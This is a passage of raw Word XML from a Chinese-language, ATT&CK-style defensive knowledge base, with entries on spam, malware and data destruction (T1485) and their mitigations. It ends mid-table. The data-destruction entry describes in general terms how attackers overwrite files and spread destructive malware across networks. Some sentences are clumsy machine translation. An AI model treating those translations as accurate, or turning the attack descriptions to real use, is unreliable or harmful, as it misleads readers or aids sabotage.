                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30B85E78" w14:textId="6F172D40" w:rsidR="00F50EDA" w:rsidRDefault="00F50EDA" w:rsidP="00F50EDA">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据源</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>日志、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>NTA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、应用日志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="30995865" w14:textId="77777777" w:rsidR="00F50EDA" w:rsidRDefault="00F50EDA" w:rsidP="00F50EDA"/>
    <w:p w14:paraId="48C8F6F2" w14:textId="05E0EC38" w:rsidR="00F50EDA" w:rsidRDefault="00F50EDA" w:rsidP="00F50EDA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>电子邮件垃圾邮件（也称为垃圾邮件）是通过电子邮件（垃圾邮件）批量发送的未经请求的邮件。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个名字来源于垃圾邮件午餐肉，通过蒙蒂蟒蛇草图，其中垃圾邮件无处不在，不可避免，重复。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D2C56F" w14:textId="50ED09CA" w:rsidR="00F50EDA" w:rsidRDefault="00F50EDA" w:rsidP="00F50EDA">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1696"/>
        <w:gridCol w:w="8040"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F50EDA" w:rsidRPr="005C4554" w14:paraId="0926AD26" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6E59C0CA" w14:textId="77777777" w:rsidR="00F50EDA" w:rsidRPr="005C4554" w:rsidRDefault="00F50EDA" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8040" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0445E9CA" w14:textId="77777777" w:rsidR="00F50EDA" w:rsidRPr="005C4554" w:rsidRDefault="00F50EDA" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F50EDA" w:rsidRPr="00671A0D" w14:paraId="3C661A43" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BCD3836" w14:textId="6EBC694B" w:rsidR="00F50EDA" w:rsidRPr="00671A0D" w:rsidRDefault="00F50EDA" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>高安全级别</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8040" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AF24C4D" w14:textId="7CE877A0" w:rsidR="00F50EDA" w:rsidRPr="00671A0D" w:rsidRDefault="00F50EDA" w:rsidP="00F50EDA">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>我们可以设置更高的安全级别，以便将垃圾邮件从电子邮件收件箱中移出。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="309D7BC0" w14:textId="77777777" w:rsidR="00F50EDA" w:rsidRPr="00F50EDA" w:rsidRDefault="00F50EDA" w:rsidP="00F50EDA">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="741C7993" w14:textId="48004271" w:rsidR="00515B4A" w:rsidRDefault="00515B4A" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>恶意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>软件</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00515B4A" w14:paraId="78ED0929" w14:textId="77777777" w:rsidTr="00515B4A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26221C03" w14:textId="1A5AAD03" w:rsidR="00515B4A" w:rsidRDefault="00515B4A" w:rsidP="00515B4A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>H</w:t>
            </w:r>
            <w:r>
              <w:t>4002</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A6F1D89" w14:textId="662C0188" w:rsidR="00BE796A" w:rsidRDefault="00BE796A" w:rsidP="00BE796A">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>技术：恶劣影响</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0599586A" w14:textId="77777777" w:rsidR="00515B4A" w:rsidRDefault="00515B4A" w:rsidP="00515B4A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>macOS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66E18C42" w14:textId="77777777" w:rsidR="00515B4A" w:rsidRDefault="00515B4A" w:rsidP="00515B4A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69C3003D" w14:textId="57007961" w:rsidR="00515B4A" w:rsidRDefault="00515B4A" w:rsidP="00515B4A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据源</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程监控日志、进程命令参数、文件监控日志、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>日志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="483D6544" w14:textId="77777777" w:rsidR="00515B4A" w:rsidRDefault="00515B4A" w:rsidP="00515B4A"/>
    <w:p w14:paraId="7CE21D08" w14:textId="070B05DE" w:rsidR="00515B4A" w:rsidRDefault="00515B4A" w:rsidP="00515B4A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>严重的恶意软件是对计算机用户有害且难以检测或删除的任何程序或文件。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意软件的类型可能包括计算机病毒，蠕虫，特洛伊木马和间谍软件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7662B22C" w14:textId="435A4555" w:rsidR="00515B4A" w:rsidRDefault="00515B4A" w:rsidP="00515B4A">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1555"/>
        <w:gridCol w:w="8181"/>
      </w:tblGrid>
      <w:tr w:rsidR="00515B4A" w:rsidRPr="005C4554" w14:paraId="4963A4EE" w14:textId="77777777" w:rsidTr="00515B4A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="5C3B469D" w14:textId="77777777" w:rsidR="00515B4A" w:rsidRPr="005C4554" w:rsidRDefault="00515B4A" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8181" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6910ED11" w14:textId="77777777" w:rsidR="00515B4A" w:rsidRPr="005C4554" w:rsidRDefault="00515B4A" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00515B4A" w:rsidRPr="00671A0D" w14:paraId="657C5D47" w14:textId="77777777" w:rsidTr="00515B4A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EBB0CB0" w14:textId="5D954A43" w:rsidR="00515B4A" w:rsidRPr="00671A0D" w:rsidRDefault="00515B4A" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>政策执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8181" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38E287B1" w14:textId="6041A53E" w:rsidR="00515B4A" w:rsidRPr="00671A0D" w:rsidRDefault="00515B4A" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>我们可以设置更高的安全级别来停止从不信任的网站下载文件并停止执行无符号二进制文件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7922B7C0" w14:textId="77777777" w:rsidR="00515B4A" w:rsidRPr="00515B4A" w:rsidRDefault="00515B4A" w:rsidP="00515B4A">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DA6DCDF" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据破坏</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00567ECD" w:rsidRPr="00A65911" w14:paraId="45B9CC94" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55741221" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>T1485</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60E861E4" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>技术：恶劣影响</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E0042DE" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B120CB8" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>所需权限：用户，管理员，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>root</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E7EF962" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>数据源：文件监控，进程命令行参数，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68321F42" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>影响类型：可用性</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65E60E27" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="03EA1E83" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47A14BC6" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会破坏特定系统或网络上大量系统中的数据和文件，从而中断系统、服务和网络资源的可用性。他们通过覆盖本地和远程驱动器上的文件或数据使得数据</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>无法通过取证技术恢复</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。常见的操作系统文件删除命令（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>del</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>rm</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）通常只删除指向文件的指针，而不会擦除文件本身的内容，从而使得文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>可以通过适当的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>取证方法来恢复。“数据破坏”与“磁盘内容擦除”及“磁盘结构擦除”的不同之处</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>在于</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>破坏</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>破坏的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>是单个文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，而不是存储磁盘分区或磁盘逻辑结构。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E4D003" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会尝试使用随机生成的数据覆盖文件和目录，从而使其无法恢复。某些情况下，攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用具有政治倾向的图像文件来覆盖数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120CB7D8" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了在以网络范围的可用性中断为目标的操作中最大限度地影响目标组织，设计用于破坏数据的恶意软件可能具有类似蠕虫的功能，通过利用其他技术（如有效帐户、凭据导出、</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>管理员共享</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等）在网络上传播。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF58827" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2689"/>
        <w:gridCol w:w="7047"/>
      </w:tblGrid>
      <w:tr w:rsidR="00567ECD" w:rsidRPr="00567ECD" w14:paraId="1D77FF5A" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="4274F9DD" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00567ECD" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00567ECD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1CA267E2" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00567ECD" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00567ECD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00567ECD" w:rsidRPr="00A65911" w14:paraId="3EDC61FE" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F8BE6A8" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00CC5590" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId257" w:history="1">
              <w:r w:rsidR="00567ECD" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>数据备份</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="551C6F08" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
